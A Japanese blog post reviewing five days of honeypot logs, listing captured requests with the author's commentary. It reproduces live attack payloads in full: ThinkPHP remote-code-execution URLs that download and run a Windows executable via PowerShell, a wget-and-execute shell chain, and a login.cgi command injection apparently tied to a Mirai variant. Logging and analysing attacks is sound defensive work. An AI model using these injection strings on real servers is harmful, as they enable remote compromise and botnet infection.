ハニーポットログ観察 3-2
5/1~5/5 5日分を見ていきたいと思います。
アクセス先
GET http://www.ceek.jp/?rands=[] GET http://www.baidu.com GET http://www.google.com/ GET /manager/html GET /.env GET /admin/assets/js/views/login.js GET /favicon.ico GET /sitemap.xml GET /.git/config GET http://[感染サイトのため伏]/echo.php GET /upload/bank-icons/bank-gh.jpg GET /upload/bank-icons/bank_16.png GET /TP/public/index.php GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 GET /nx8j78af1b.jsp GET /login.cgi?cli=aa%20aa%27;wget%20http://[↓]/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ *1 GET /script GET http://[]/testget?q=23333&port=80 *2 GET /.well-known/security.txt GET /Lists/admin.php GET /wp-login.php GET ///?author=1 GET ///wp-json/wp/v2/users/ GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe *3 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://[]/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a *4 GET /w00tw00t.at.blackhats.romanian.anti-sec:) GET /phpMyAdmin/scripts/setup.php GET /pma/scripts/setup.php GET /phpmy/scripts/setup.php GET /MyAdmin/scripts/setup.php GET /console/login/LoginForm.jsp GET http://api.ipify.org/ GET http://www.123cha.com/ GET http://www.ip.cn/ GET /blog/wp-includes/wlwmanifest.xml GET /wordpress/wp-includes/wlwmanifest.xml GET /jmx-console/ GET /HNAP1/ GET ttp[]//azenv.net/ GET /admin-scripts.asp POST /TP/public/index.php?s=captcha POST /tmUnblock.cgi POST /users?page=&size=5 CONNECT www.google.com:443 CONNECT www.baidu.com:443 CONNECT cn.bing.com:443 PUT /FxCodeShell.jsp::$DATA HEAD /robots.txt OPTIONS /
(virus total 1VirusTotal
2VirusTotal, 3VirusTotal, 4VirusTotal)
考察
このログと考察を書く時間がだいぶずれてしまったので、当時何を書こうか思い出せない状態ですが、 パッと見たところ気になるものを書いてみたいと思います。
1.GET /sitemap.xml
サイトマップのチェック サイトマップとは(サイトマップについて - Search Console ヘルプ)
2.GET /public/index.php?s=index/think\app/invokefunction~
Think PHP というフレームワークへの攻撃 中国で割とポピュラーなフレームワークの脆弱性らしい 詳しくはここ
や
ThinkPHPという中国のフレームワークの脆弱性が狙われて、中国の45000のサイトが攻撃を受け続けている - orangeitems’s diary この方のブログに詳しく乗っています。 結構大きい攻撃ということがわかりますね。 恐ろしいというか気持ち悪いというか。。。
3.GET /login.cgi?cli=aa%20aa%27;wget%20http~
satoriっぽいです。Mirai亜種とか言われていますね。 攻撃に成功した場合、ボットネットを構築されてしまう。つまりMirai同様拡散されていくタイプですね。 攻撃の内容については、別記事で自分なりにリサーチしてみたいと思っています。 まあ調べればほかの方が調べた記事などが出てくるので詳しく知りたい方はそちらを 参照してもらえばと思います。
4.GET http:///testget?q=23333&port=80
悪意のあるスクリプトを動かそうとしているのだと思います。 普通にVirusTotalではmaliciousの判定になった。 詳しいことはわかりませんが'23333'は日本語で言うところの'爆笑'みたいな 中国のスラングっぽい。
5.GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell~
明らかに攻撃しているのがわかります。 途中で切っていますが 先ほど挙げたThinkPHPへの攻撃から始まり、powershellを起動しマルウェアを ダウンロードしようとしているのだと思います。 Windowsを狙った攻撃のように見えますね。 ztlkmociezbzjeo31521.exeはよくわからない。詳しく解析する必要があります。
6.GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)~
上同様ThinkPHPの脆弱性を利用した攻撃を踏まえてのさらなる攻撃っぽいです。
7.GET /w00tw00t.at.blackhats.romanian.anti-sec:)
phpMyAdminへの攻撃。 とにかく沢山来ます。 詳しくは ozuma.hatenablog.jp この方のブログがとても分かりやすいです。
感想
とにかく不正中継やphpMyAdminを狙った攻撃など、多い攻撃のパターンがわかってきました。その中に少し真新しいのがある感じかな。 ログが沢山溜まってきたので面白そうなものがあったらそれだけについての記事なども書いてみたいです。 普通に解析楽しいです。
今回はこんな感じで終わりにします。